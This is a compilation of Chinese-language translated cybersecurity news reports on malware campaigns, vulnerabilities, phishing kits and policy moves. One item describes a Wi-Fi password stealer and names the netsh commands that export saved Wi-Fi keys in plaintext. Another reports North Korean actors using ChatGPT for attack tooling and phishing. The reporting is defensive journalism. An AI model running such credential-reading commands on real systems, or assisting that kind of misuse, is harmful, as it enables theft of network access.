HackerNews

HackerNews 编译，转载请注明出处： 白俄罗斯黑客组织利用带有恶意软件的 Microsoft Excel 文档作为诱饵，以传递 PicassoLoader 的新变种。据评估，这一威胁集群是自 2016 年以来由与白俄罗斯对齐的黑客组织（称为 Ghostwriter，又名 Moonscape、TA445、UAC-0057 和 UNC1151）发起的长期活动的延伸。 “该活动自 2024 年 7 月至 8 月开始筹备，并于 11 月至 12 月进入活跃阶段，” SentinelOne 研究员 Tom Hegel 在一份与《黑客新闻》共享的技术报告中表示。“最近的恶意软件样本和命令与控制（C2）基础设施活动表明，该行动在最近几天仍然活跃。” 这家网络安全公司分析的攻击链的起点是一个来自名为 Vladimir Nikiforech 的账户的 Google Drive 共享文档，该文档托管了一个 RAR 压缩包。 远程访问木马（RAT）文件包含一个恶意 Excel 工作簿，当打开时，如果潜在受害者启用宏运行，将触发执行一个混淆的宏。该宏随后写入一个 DLL 文件，最终为 PicassoLoader 的简化版本铺平了道路。 在下一阶段，会向受害者显示一个诱饵 Excel 文件，而在后台，系统上会下载额外的有效载荷。早在 2024 年 6 月，这种方法就被用于传递 Cobalt Strike 后利用框架。 SentinelOne 表示，还发现了其他带有乌克兰主题诱饵的武器化 Excel 文档，这些文档从远程 URL（“sciencealert[.]shop”）检索一个未知的第二阶段恶意软件，形式为看似无害的 JPG 图像，这种技术被称为隐写术。这些 URL 已不再可用。 在另一个实例中，被动手动的 Excel 文档被用来传递一个名为 LibCMD 的 DLL，该 DLL 旨在运行 cmd.exe 并连接到 stdin/stdout。它直接作为 .NET 程序集加载到内存中并执行。 “在整个 2024 年，Ghostwriter 反复使用包含 Macropack 混淆的 VBA 宏的 Excel 工作簿，并投放用 ConfuserEx 混淆的嵌入式 .NET 下载程序，” Hegel 说。   消息来源：The Hacker News；  本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 安全研究员穆罕默德·沙哈特披露了影响GatesAir Maxiva UAXT和VAXT发射机的三项关键漏洞。这些广泛部署的发射机被用于广播、交通和公共安全等多个行业。如果被利用，这些漏洞可能导致严重后果，包括会话劫持、数据泄露和系统全面沦陷。 漏洞详情如下： CVE-2025-22960（会话劫持）：此漏洞允许未经身份验证的攻击者访问暴露的日志文件，可能会泄露敏感的会话相关信息，如会话ID和身份验证令牌。攻击者可利用此漏洞劫持活跃会话，获得未授权访问权限，并在受影响设备上提升权限。 CVE-2025-22961（数据泄露）：攻击者可通过公开暴露的URL直接访问敏感数据库备份文件（snapshot_users.db）。此漏洞可能导致敏感用户数据泄露，包括登录凭证，进而可能导致系统全面沦陷。 CVE-2025-22962（远程代码执行）：当调试模式启用时，拥有有效会话ID的攻击者可发送精心构造的POST请求，在底层系统上执行任意命令。这一关键漏洞可导致系统全面沦陷，包括未授权访问、权限提升以及可能的设备完全接管。 沙哈特还公布了这些漏洞的概念验证利用代码，这加剧了这些漏洞的严重性，使得恶意行为者更容易利用这些漏洞。这凸显了立即采取行动以缓解风险的紧迫性。 GatesAir尚未为这些漏洞发布补丁。在此期间，建议使用受影响发射机的组织采取以下防御措施： 限制对敏感日志文件和目录的访问。 对日志和备份文件实施严格的文件权限。 避免记录敏感的会话相关数据。 在存储前对敏感数据进行加密。 在生产环境中禁用调试模式。 实施更强的身份验证和会话管理。 定期对系统及其文件处理过程进行安全审计。 强烈建议使用GatesAir Maxiva UAXT和VAXT发射机的组织立即采取行动，保护其关键基础设施免受潜在攻击。   消息来源：Cybersecurity News； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： eSentire 威胁响应单元（TRU）披露了一项针对 Mac 用户的新活动，该活动利用 Poseidon Stealer 恶意软件。此活动通过假冒合法的 DeepSeek 平台网站，诱骗用户下载并执行恶意负载。 感染始于用户被重定向到假冒的 DeepSeek 网站 deepseek.exploreio[.]net，通常通过恶意广告。该假冒网站与真实的 DeepSeek 网站非常相似，欺骗用户点击 “立即开始” 按钮，这将引导用户进入下载页面。点击 “下载 Mac OS” 后，会下载一个恶意的 DMG 文件。 下载的 DMG 文件包含一个伪装成 DeepSeek 应用程序的 shell 脚本。当用户将此 “应用程序” 拖放到终端时，脚本会执行，绕过 macOS GateKeeper 安全措施。脚本随后下载并执行 Poseidon Stealer 负载。 Poseidon Stealer 是一种恶意软件即服务（MaaS），针对基于 Chromium/Firefox 的浏览器中的敏感数据，包括信用卡、密码、书签和加密货币钱包数据。它还收集系统信息，窃取密钥链数据库，并从桌面、下载和文档目录中窃取文件。 该攻击通过利用终端执行方法绕过了 Gatekeeper 保护。Poseidon Stealer 负载采用反调试和字符串加密技术来阻碍分析。恶意软件还包含检查是否在沙盒或研究环境中运行，如果检测到则会终止自身。 用户应保持警惕，防范假冒软件下载网站，并实施主动安全措施以降低风险。   消息来源：Cybersecurity News； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

网络安全公司 Bitdefender 的研究人员日前发现，网络犯罪分子正在针对《反恐精英 2》（CS2）社区实施“直播劫持”诈骗。据 Bitdefender 实验室研究员 Ionuț Băltăriu 介绍，这些攻击利用被劫持和伪造的电竞主播账号作为信任载体，导致大量玩家的 Steam 账号被盗、加密货币失窃以及珍贵游戏道具损失。 这种通过直播劫持诈骗加密货币的行为听起来颇具未来感，但其背后的诈骗手法却相当古老 —— 通过伪装成可信主体，诱使受害者交出自己的财物。Bitdefender 详细拆解了这一诈骗过程： 首先，诈骗者会寻找拥有现成订阅用户的正规 YouTube 账号，并设法将其劫持并接管。在控制账号后，他们会重新包装频道，伪装成知名电竞主播，如“Oleksandr’s1mple’ Kostyljev”、“Nikola ‘NiKo’ Kovač”或“donk”等。伪装手段包括上传大量旧的、循环播放的直播内容。 随后，诈骗者开始进行恶意直播，循环播放被冒充主播的旧游戏画面。在此过程中，他们会邀请观众参与直播活动，声称免费赠送 CS2 皮肤和加密货币。此时，诈骗者会分享特制的二维码或欺诈性链接。 最后，当受害者被诱导登录 Steam 账号以获取所谓的“免费奖励”，或被要求发送加密货币以实现“翻倍”时，诈骗行为便完成了。一旦受害者上钩，他们的 Steam 账号将被洗劫一空，珍贵的游戏皮肤和道具不翼而飞，而他们的加密货币也将一去不返。 Bitdefender 指出，CS2 社区是这些诈骗者的主要目标。作为一款拥有 2600 万注册玩家（截至 2025 年 1 月）的热门竞技游戏，CS2 的高人气使其成为诈骗者的理想目标。此外，近期备受瞩目的电子竞技赛事，如 2025 年 IEM 卡托维兹和 PGL 克卢日-纳波卡，也成为了诈骗者利用的对象。他们通过制作与赛事主题相关或时间同步的虚假直播，并配合虚假社区帖子和受控评论，进一步诱导玩家上当。 IT之家注意到，为了帮助玩家防范此类诈骗，Bitdefender 在其博客中分享了一些实用建议。玩家应保持高度警惕，对“好得令人难以置信”的福利、可疑的链接和二维码，以及不熟悉的直播频道保持怀疑。此外，Bitdefender 还建议玩家启用 Steam Guard 和多因素认证（MFA）。 转自IT之家，原文链接：https://www.ithome.com/0/833/073.htm 封面来源于网络，如有侵权请联系删除

HackerNews 编译，转载请注明出处： 一个由超过 130,000 台被攻陷设备组成的庞大僵尸网络正在对全球的 Microsoft 365 (M365) 账户进行密码喷雾攻击，目标是基本身份验证，以绕过多因素身份验证。 根据 SecurityScorecard 的一份报告，攻击者利用信息窃取恶意软件窃取的凭据，大规模针对这些账户。 这些攻击依赖于使用基本身份验证（Basic Auth）的非交互式登录，以绕过多因素身份验证（MFA）保护，在未经授权的情况下访问账户，而不会触发安全警报。 “仅依赖交互式登录监控的组织对这些攻击视而不见。非交互式登录，通常用于服务到服务的身份验证、遗留协议（例如 POP、IMAP、SMTP）和自动化流程，在许多配置中不会触发 MFA，”SecurityScorecard 警告道。 “基本身份验证在某些环境中仍然启用，允许以明文形式传输凭据，使其成为攻击者的首要目标。” 基本身份验证是一种过时的身份验证方法，用户的凭据以明文或 base64 编码形式随每个请求发送到服务器。它缺乏现代安全功能，如 MFA 和基于令牌的身份验证，微软计划在 2025 年 9 月弃用它，转而支持 OAuth 2.0，已经为大多数 Microsoft 365 服务禁用了基本身份验证。 这个新发现的僵尸网络使用基本身份验证尝试，针对大量账户使用常见或泄露的密码。由于基本身份验证是非交互式的，当尝试的凭据匹配时，攻击者不会被提示进行 MFA，并且通常不会受到条件访问策略（CAP）的限制，这使得攻击者可以悄无声息地验证账户凭据。 一旦凭据得到验证，它们可以用于访问不需要 MFA 的遗留服务，或在更复杂的网络钓鱼攻击中绕过安全功能，获得对账户的完全访问权限。 SecurityScorecard 还指出，您可能可以在 Entra ID 日志中看到密码喷雾攻击的迹象，这将显示非交互式登录的登录尝试增加，不同 IP 地址的多次失败登录尝试，以及身份验证日志中存在 “fasthttp” 用户代理。 今年 1 月，SpearTip 警告称，有威胁行为者以类似方式使用 FastHTTP Go 库进行 Microsoft 365 密码攻击，但未提及非交互式登录。目前尚不清楚这是否是僵尸网络的新发展，以规避检测。   消息来源：Bleeping Computer； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处：   OpenAI 表示，已阻止多个朝鲜黑客组织使用其 ChatGPT 平台来研究未来目标并寻找入侵其网络的方法。 “我们封禁了显示与公开报道的朝鲜相关威胁行为者活动的账户，”该公司在 2025 年 2 月的威胁情报报告中表示。 “其中一些账户的活动与一个名为 VELVET CHOLLIMA（又名 Kimsuky、Emerald Sleet）的威胁组织的行为一致，而其他账户则可能与一个被可信来源评估为与 STARDUST CHOLLIMA（又名 APT38、Sapphire Sleet）相关的组织有关。” 这些被封禁的账户是通过一个行业合作伙伴提供的信息检测到的。除了研究网络攻击中使用的工具外，这些威胁行为者还利用 ChatGPT 获取与加密货币相关的信息，这与朝鲜国家支持的威胁组织的常见兴趣相关。 这些恶意行为者还利用 ChatGPT 进行编码辅助，包括如何使用开源远程管理工具（RAT），以及对用于远程桌面协议（RDP）暴力攻击的开源和公开可用的安全工具和代码进行调试、研究和开发辅助。 OpenAI 的威胁分析师还发现，朝鲜行为者在调试自动启动扩展点（ASEP）位置和 macOS 攻击技术时，暴露了当时安全供应商未知的恶意二进制文件的暂存 URL。 这些暂存 URL 和相关的编译可执行文件被提交给一个在线扫描服务，以便与更广泛的安全社区共享。因此，一些供应商现在能够可靠地检测到这些二进制文件，保护潜在受害者免受未来攻击。 OpenAI 在研究朝鲜威胁行为者如何使用被封禁账户时发现的其他恶意活动包括但不限于： – 询问各种应用程序中的漏洞， – 开发和排除 C# 基 RDP 客户端的故障，以启用， – 要求代码以绕过未经授权的 RDP 的安全警告， – 请求多个 PowerShell 脚本，用于 RDP 连接、文件上传/下载、从内存中执行代码和混淆 HTML 内容， – 讨论创建和部署混淆的有效载荷以供执行， – 寻求对加密货币投资者和交易者进行针对性网络钓鱼和社会工程的方法，以及更通用的网络钓鱼内容， – 制作网络钓鱼电子邮件和通知，诱使用户透露敏感信息。 该公司还封禁了与一个潜在的朝鲜 IT 工人计划相关的账户，该计划被描述为具有通过欺骗西方公司雇佣朝鲜人来为平壤政权获取收入的所有特征。 “在似乎获得就业后，他们使用我们的模型执行与工作相关的任务，如编写代码、排除故障和与同事交流，”OpenAI 解释道。“他们还使用我们的模型来编造掩盖故事，以解释异常行为，如避免视频通话、从未经授权的国家访问公司系统或工作时间不规律。”   消息来源：Bleeping Computer； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 澳大利亚成为最新一个因国家安全问题禁止安装俄罗斯公司卡巴斯基安全软件的国家。 澳大利亚内政部秘书斯蒂芬妮·福斯特（Stephanie Foster PSM）表示：“经过威胁和风险分析后，我决定，澳大利亚政府机构使用卡巴斯基实验室的产品和网络服务对澳大利亚政府、网络和数据构成不可接受的安全风险，这些风险来自外国干涉、间谍活动和破坏行为。” 福斯特还指出，政府需要向关键基础设施和其他澳大利亚政府部门传递强烈的政策信号，表明使用卡巴斯基产品和服务带来的安全风险不可接受。 她进一步强调，相关机构有责任管理卡巴斯基庞大用户数据收集所带来的风险，以及该数据可能受到外国政府非法指令的影响，这些指令与澳大利亚法律相冲突。 根据政府于2月23日发布的新指令（002-2025），政府机构不得在其系统和设备上安装卡巴斯基的产品和服务，并必须在2025年4月1日之前删除所有现有安装。 不过，机构可以申请豁免，若其使用卡巴斯基软件是出于“合法商业原因”，并确保采取适当的风险缓解措施。 这些豁免将是有时间限制的，仅限于满足合规性和执法要求的用途。 此举紧随美国的脚步。2024年6月末，美国禁止卡巴斯基在国内销售其软件和产品，或向现有客户发布产品更新。该公司于2024年7月中旬退出了美国市场。   消息来源：The Hacker News；  本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 网络安全研究人员警告称，一种新的恶意软件活动利用破解软件作为诱饵，传播信息窃取器，如 Lumma 和 ACR Stealer。 AhnLab 安全情报中心（ASEC）表示，自 2025 年 1 月以来，ACR Stealer 的分发量显著增加。 这种信息窃取恶意软件的一个显著特点是使用了一种称为 dead drop resolver 的技术来提取实际的命令与控制（C2）服务器。这包括依赖于合法服务，如 Steam、Telegram 的 Telegraph、Google Forms 和 Google Slides。 “威胁行为者将实际的 C2 域名以 Base64 编码的形式输入到特定页面，”ASEC 表示。“恶意软件访问该页面，解析字符串，并获取实际的 C2 域名地址以执行恶意行为。” ACR Stealer 之前通过 Hijack Loader 恶意软件分发，能够从受攻陷的系统中窃取广泛的信息，包括文件、网络浏览器数据和加密货币钱包扩展。 与此同时，ASEC 还披露了另一项活动，该活动利用扩展名为 “MSC” 的文件，这些文件可以通过 Microsoft Management Console（MMC）执行，来传递 Rhadamanthys 信息窃取器。 “有两种类型的 MSC 恶意软件：一种利用 apds.dll 的漏洞（CVE-2024-43572），另一种使用控制台任务面板执行‘命令’，”这家韩国公司表示。 “MSC 文件伪装成 MS Word 文档。当点击‘打开’按钮时，它会从外部来源下载并执行一个 PowerShell 脚本。下载的 PowerShell 脚本包含一个 EXE 文件（Rhadamanthys）。” CVE-2024-43572，也称为 GrimResource，于 2024 年 6 月首次被 Elastic 安全实验室记录为被恶意行为者利用的零日漏洞。微软在 2024 年 10 月修复了该漏洞。 此外，还观察到恶意软件活动利用聊天支持平台，如 Zendesk，伪装成客户，诱骗不知情的支持代理下载一种名为 Zhong Stealer 的信息窃取器。 根据 Hudson Rock 最近发布的一份报告，在过去的几年中，超过 3000 万台计算机被信息窃取器感染，导致企业凭据和会话 cookie 被窃取，这些凭据和会话 cookie 随后被网络犯罪分子在地下论坛上出售给其他行为者以牟利。 买家可以利用这些凭据获得的访问权限，进行自己的后续攻击行动，导致严重风险。这些发展突显了信息窃取器作为初始访问向量的作用，为敏感企业环境提供了立足点。 “网络犯罪分子可以以每台计算机（日志）10 美元的价格，从从事机密国防和军事部门工作的员工那里购买被盗数据，”Hudson Rock 表示。“信息窃取器情报不仅仅是检测谁被感染——更重要的是理解被攻陷凭据和第三方风险的整个网络。” 在过去一年中，威胁行为者还加大了通过一种称为 ClickFix 的技术传播各种恶意软件家族的努力，这通常涉及将用户重定向到假的 CAPTCHA 验证页面，指示他们复制并执行恶意的 PowerShell 命令。其中一种被投放的有效载荷是 I2PRAT，它利用 I2P 匿名网络来隐藏其最终的 C2 服务器。   消息来源：The Hacker News；  本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 澳大利亚软件公司 Atlassian 修复了 Bamboo、Bitbucket、Confluence、Crowd 和 Jira 产品中的 12 个关键和高危漏洞。 Atlassian 发布了安全补丁，以解决这些产品中的漏洞。其中最严重的漏洞包括： CVE-2024-50379（CVSS 评分为 9.8）：Confluence Data Center 和 Server 中的 Apache Tomcat 依赖项存在远程代码执行（RCE）漏洞。该漏洞是 Apache Tomcat 中的一个 TOCTOU 竞态条件，允许在大小写不敏感的文件系统上通过非默认的写启用 servlet 进行 RCE。受影响版本：9.0.0.M1-9.0.97、10.1.0-M1-10.1.33、11.0.0-M1-11.0.1。更新至 9.0.98、10.1.34 或 11.0.2。 CVE-2024-56337（CVSS 评分为 9.8）：Confluence Data Center 和 Server 中的 Apache Tomcat 依赖项存在 RCE 漏洞。该漏洞是 Apache Tomcat 的 TOCTOU 漏洞，由对 CVE-2024-50379 的不完全缓解引起。受影响版本：9.0.0-M1–9.0.97、10.1.0-M1–10.1.33、11.0.0-M1–11.0.1。需要在大小写不敏感的文件系统上进行额外配置。修复版本：Tomcat 9.0.99、10.1.35 和 11.0.3。 CVE-2024-52316（CVSS 评分为 9.8）：Crowd Data Center 和 Server 中的 Apache Tomcat 依赖项存在认证绕过和会话管理（BASM）漏洞。Apache Tomcat 的 Jakarta Authentication 中的一个未检查错误可能导致认证绕过，如果自定义 ServerAuthContext 在未设置 HTTP 状态的情况下失败。受影响版本：9.0.0-M1–9.0.95、10.1.0-M1–10.1.30、11.0.0-M1–11.0.0-M26。更新至 9.0.96、10.1.31 或 11.0.0。 Atlassian 未披露这些漏洞是否已在野外被利用。   消息来源：Security Affairs； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 一个名为 Windows-WiFi-Password-Stealer 的 GitHub 仓库引发了网络安全专业人士的关注。 该仓库由用户托管，提供了一个基于 Python 的脚本，能够从 Windows 系统中提取保存的 Wi-Fi 凭证，并将其保存到文本文件中。 尽管该仓库声称用于教育目的，但其潜在的恶意使用风险不容忽视。 恶意软件详情 根据 X 上的一篇网络地下帖子，该仓库包含以下关键文件： Password Stealer.py：执行凭证提取过程的主脚本。 requirements.txt：运行脚本所需的 Python 依赖项列表。 README.md：包含安装和使用说明的文档。 该工具执行 netsh wlan show profile，这是一个合法的网络 shell 命令，用于获取与系统关联的服务集标识符（SSID）列表。 对于每个 SSID，该工具随后运行 netsh wlan export profile，生成包含配置详细信息的 XML 文件，包括明文的预共享密钥（PSK）。 这些 XML 文件暂时存储在系统的当前工作目录中，由 Python 脚本解析以提取密码，随后被删除以规避检测。 该方法利用了 Windows 对 Wi-Fi 凭证的原生处理方式，这些凭证以加密形式存储在凭据管理器中。 该工具的简单性和开源性质降低了恶意使用的门槛。用 Python 编写，依赖项极少，可使用 PyInstaller 转换为独立可执行文件。 要使用该工具，用户需安装依赖项： pip install -r requirements.txt 此外，README 提供了使用 PyInstaller 将脚本转换为可执行文件的说明：   pyinstaller –onefile PasswordStealer.py 这一功能简化了部署，使非技术用户也能轻松使用，增加了其被恶意利用的可能性。GitHub 仓库提供了清晰的编译说明，即使是新手用户也能生成针对特定攻击场景的有效载荷。 此类工具在 GitHub 等平台上的公开可用性带来了显著风险。恶意行为者可以轻松地将代码重新用于凭证收集，从而实现未经授权的网络访问或在受攻陷环境中进行横向移动。 组织应强制实施多因素认证用于 Wi-Fi 访问，并定期轮换 PSK，以减少凭证泄露的影响。 尽管该工具本身并非固有恶意，但其滥用突显了操作系统处理敏感凭证方式的关键漏洞。   消息来源：Cybersecurity News；  本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 美国网络安全与基础设施安全局（CISA）警告称，Craft CMS 的一个远程代码执行漏洞正在被利用进行攻击。 该漏洞被追踪为 CVE-2025-23209，是一个高严重性（CVSS v3 评分：8.0）的代码注入（RCE）漏洞，影响 Craft CMS 4 和 5 版本。 Craft CMS 是一个用于构建网站和自定义数字体验的内容管理系统（CMS）。 关于 CVE-2025-23209 的技术细节不多，但利用该漏洞并不容易，因为它需要安装的安全密钥已经被攻破。 在 Craft CMS 中，安全密钥是一个加密密钥，用于保护用户认证令牌、会话 cookie、数据库值和敏感应用程序数据。 CVE-2025-23209 漏洞只有在攻击者已经获得这个安全密钥时才会成为问题，这为解密敏感数据、生成伪造的认证令牌或远程注入和执行恶意代码打开了大门。 CISA 已将该漏洞添加到已知被利用漏洞（KEV）目录中，但未分享任何关于攻击范围和来源以及目标的信息。 联邦机构需在 2025 年 3 月 13 日之前修补 Craft CMS 漏洞。 该漏洞已在 Craft 5.5.8 和 4.13.8 版本中修复，因此建议用户尽快升级到这些版本或更高版本。 如果您怀疑系统已被攻破，建议删除 `.env` 文件中包含的旧密钥，并使用 `php craft setup/security-key` 命令生成新的密钥。请注意，密钥更改将使使用旧密钥加密的任何数据无法访问。 除了 CVE-2025-23209 之外，CISA 还将 Palo Alto Networks 防火墙中的一个漏洞（CVE-2025-0111）添加到已知被利用漏洞目录中，并设定了相同的 3 月 13 日截止日期。 这是一个影响 PAN-OS 防火墙的文件读取漏洞，供应商披露黑客将其作为利用链的一部分，与 CVE-2025-0108 和 CVE-2024-9474 一起利用。 受该漏洞影响的用户可以查看 Palo Alto Networks 的安全公告，了解修复该漏洞的 PAN-OS 版本。   消息来源：Bleeping Computer； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 一款名为 SpyLend 的安卓恶意软件应用已在 Google Play 上下载超过 10 万次，该应用伪装成金融工具，但实际上是一个针对印度用户的掠夺性贷款应用。 该应用属于一系列名为 “SpyLoan” 的恶意安卓应用程序，这些应用伪装成合法的金融工具或贷款服务，但实际上会从设备中窃取数据，用于掠夺性贷款。 这些应用以快速、便捷的贷款承诺吸引用户，通常要求的文件很少，提供的条件也很有吸引力。然而，安装后，它们会请求过多的权限，允许应用窃取个人数据，如联系人、通话记录、短信、照片和设备位置。 这些被窃取的信息随后被用于骚扰、敲诈和勒索用户，特别是当他们未能满足应用的还款条款时。 贷款诈骗和敲诈 网络安全公司 CYFIRMA 发现了一款名为 “Finance Simplified” 的安卓应用，该应用声称是一个金融管理应用，并在 Google Play 上获得了 10 万次下载。 然而，CYFIRMA 表示，该应用在某些国家（如印度）表现出更恶意的行为，从用户的设备中窃取数据，用于掠夺性贷款。研究人员还发现了其他恶意 APK，似乎是同一恶意软件活动的变种，分别是 KreditApple、PokketMe 和 StashFur。 尽管该应用现已从 Google Play 上移除，但它可能继续在后台运行，从受感染的设备中收集敏感信息。 恶意应用在 Google Play 上 Google Play 上 “Finance Simplified” 的多条用户评论显示，该应用提供的贷款服务会试图敲诈借款人，如果他们不支付高利率。 “非常非常非常糟糕的应用，他们提供的贷款金额很低，并且会勒索支付高额利息，否则会将照片编辑成裸照并进行勒索，”一位用户对这款已被下架的应用进行了评价。 这些应用还声称自己是注册的非银行金融机构（NBFC），但 CYFIRMA 表示这是不真实的。 为了在 Google Play 上躲避检测，Finance Simplified 使用 WebView 将用户重定向到外部网站，从那里下载托管在 Amazon EC2 服务器上的贷款应用 APK。 “Finance Simplified 应用似乎专门针对印度用户，显示并推荐贷款应用，加载一个 WebView，显示一个重定向到外部网站的贷款服务，从那里下载一个单独的贷款 APK 文件，”CYFIRMA 解释道。 研究人员发现，如果用户的位置是印度，该应用只会加载具有欺骗性的界面，这表明该活动具有特定的目标。 应用窃取的敏感数据 该恶意软件活动更令人担忧的方面是数据收集，包括存储在用户设备上的敏感个人信息。 以下是该恶意软件窃取的数据摘要： – 联系人、通话记录、短信和设备详细信息。 – 来自内部和外部存储的照片、视频和文档。 – 实时位置跟踪（每 3 秒更新一次）、历史位置数据和 IP 地址。 – 最近复制到剪贴板的 20 条文本输入。 – 贷款历史和银行短信交易记录。 尽管这些数据主要用于敲诈那些错误地申请贷款的受害者，但也可能用于金融诈骗或转售给网络犯罪分子以牟利。 SpyLend 运营概述 如果您怀疑您的设备被上述任何应用或类似应用感染，请立即删除它们，重置权限，更改银行账户密码，并进行设备扫描。 Google 的 Play Protect 工具可以检测并阻止已知的恶意软件和掠夺性应用，因此请确保您的设备上已激活该工具。   消息来源：Bleeping Computer； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 谷歌云宣布在其云密钥管理服务（Cloud KMS）中引入量子安全数字签名功能，目前该功能已在预览版中提供。 这家科技巨头表示，这一举措符合美国国家标准与技术研究院（NIST）的后量子密码学（PQC）标准，旨在应对量子计算可能破坏经典加密方案的未来风险。 鉴于谷歌云被金融机构、大型企业、政府机构、关键基础设施单位和软件开发者广泛使用，引入量子安全加密对于保护敏感数据免受高级攻击至关重要。 量子就绪的 Cloud KMS Cloud KMS 是谷歌云的加密密钥管理工具，用于安全地生成、存储和管理用于加密和签名数据的加密密钥。 使用传统的公钥密码学（如 RSA 和 ECC），客户面临未来通过所谓的“现在收集，以后解密”（HNDL）攻击暴露数据的风险。 尽管目前尚不存在能够破解当前加密方案的量子计算机，但所有专家都一致认为 HNDL 风险过高，不可忽视。微软宣布其 Majorana 1 芯片取得突破，这标志着向构建未来量子计算机迈出了关键一步，进一步加剧了这一担忧。 为了帮助保护我们的数据免受未来量子计算的威胁，谷歌现在正在将抗量子密码学集成到 Cloud KMS（软件）和 Cloud HSM（硬件安全模块）中。 采用的两种算法是 ML-DSA-65（FIPS 204），一种基于格的数字签名算法，以及 SLH-DSA-SHA2-128S（FIPS 205），一种无状态的基于哈希的数字签名算法。 “今天，我们很高兴地宣布在谷歌云密钥管理服务（Cloud KMS）中推出量子安全数字签名（FIPS 204/FIPS 205），用于软件密钥，目前该功能已在预览版中提供，”谷歌在公告中表示。 “我们还分享了谷歌云加密产品的后量子战略的高层次视图，包括 Cloud KMS 和我们的硬件安全模块（Cloud HSM）。” Cloud KMS 现在允许用户使用这些新的 PQC 算法进行数字签名的签名和验证，就像使用传统密码学一样。 这些加密实现将通过 BoringCrypto 和 Tink 库开源，保持透明度并允许独立的安全审计。 谷歌邀请各组织开始测试和集成抗量子算法到现有部署中，并报告他们的反馈，以帮助解决任何问题。   消息来源：Bleeping Computer； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 网络犯罪分子现在可以利用 Darcula PhaaS 平台的最新版本 v3，在几分钟内克隆任何品牌的网站，进一步降低了大规模实施网络钓鱼攻击所需的技术门槛。 这一最新版本的网络钓鱼工具 “代表着犯罪能力的重大转变，降低了坏人针对任何品牌发起复杂、可定制网络钓鱼活动的门槛，” 网络安全公司 Netcraft 在一份新分析报告中指出。 Netcraft 表示，自 2024 年 3 月底首次曝光 Darcula 以来，已检测并阻止了超过 95,000 个新的 Darcula 网络钓鱼域名、近 31,000 个 IP 地址，并关闭了超过 20,000 个欺诈网站。 Darcula 最大的变化是允许任何用户按需生成任何品牌的网络钓鱼工具包。 “新的重制版本现已准备好进行测试，” 该服务的核心开发人员于 2025 年 1 月 19 日在一个拥有超过 1,200 名订阅者的 Telegram 频道中发布消息表示。 “现在，你还可以自己定制前端。使用 darcula-suite，你可以在 10 分钟内完成前端的制作。” 要做到这一点，客户只需在网页界面中提供要冒充品牌的 URL，平台将使用浏览器自动化工具（如 Puppeteer）导出 HTML 和所有所需资源。 用户随后可以选择要替换的 HTML 元素并注入网络钓鱼内容（例如支付表单和登录字段），使其与品牌登陆页面的外观和感觉相匹配。生成的网络钓鱼页面随后上传到管理面板。 “像任何 SaaS 产品一样，darcula-suite PhaaS 平台提供管理仪表板，使欺诈者可以轻松管理他们的各种活动，” 安全研究员 Harry Freeborough 表示。 “一旦生成，这些工具包将上传到另一个平台，犯罪分子可以在该平台上管理他们的活跃活动、查找提取的数据并监控已部署的网络钓鱼活动。” 除了提供展示网络钓鱼活动聚合性能统计信息的仪表板外，Darcula v3 还进一步提供了一种方法，将被盗的信用卡详细信息转换为受害者的虚拟卡片图像，可以扫描并添加到数字钱包中用于非法目的。具体来说，这些卡片被加载到一次性手机上并出售给其他犯罪分子。 该工具目前处于内部测试阶段。在 2025 年 2 月 10 日的后续帖子中，恶意软件作者发布消息表示：“我最近很忙，所以 v3 更新将推迟几天。”   消息来源：The Hacker News； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 苹果公司周五宣布，由于英国政府要求获得加密用户数据的后门访问权限，将立即在英国移除 iCloud 的高级数据保护（ADP）功能。 据彭博社首次报道，ADP 是 iCloud 的一个可选设置，确保用户的受信任设备唯一持有用于解锁存储在云端数据的加密密钥。这包括 iCloud 备份、照片、笔记、提醒、Safari 书签、语音备忘录以及与苹果自家应用相关的数据。 “鉴于数据泄露和其他对客户隐私的威胁不断增加，我们对无法在英国为客户提供 ADP 保护感到非常失望，”苹果公司被引用对彭博社表示。“ADP 通过端到端加密保护 iCloud 数据，这意味着数据只能由拥有它的用户在其受信任设备上解密。” 据报道，已经使用 ADP 的用户需要在尚未指定的时间内手动禁用该功能，因为苹果“无法代表他们自动禁用它。” 这一前所未有的举措仅在数周前，有报道称英国政府已下令苹果建立后门以访问任何苹果用户的 iCloud 内容。 据《华盛顿邮报》报道，该要求由英国内政部根据《调查权力法》（IPA），也称为《窥探者宪章》，发出，“要求全面能力以查看完全加密的材料，而不仅仅是协助破解特定账户。” 随着在该地区移除 ADP，苹果现在只为 iCloud 提供标准数据保护，该保护加密用户数据但将加密密钥存储在其自己的数据中心，从而使执法部门在获得搜查令的情况下可以访问这些数据。 上周，美国参议员罗恩·怀登和众议员安迪·比格斯致函国家情报总监图尔西·加巴德，敦促英国撤回其命令，称这威胁到美国人民和美国政府的隐私和安全。 “如果英国不立即逆转这一危险行为，我们敦促你重新评估美英网络安全安排和项目以及美国与英国的情报共享，”他们补充道。   消息来源：The Hacker News； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

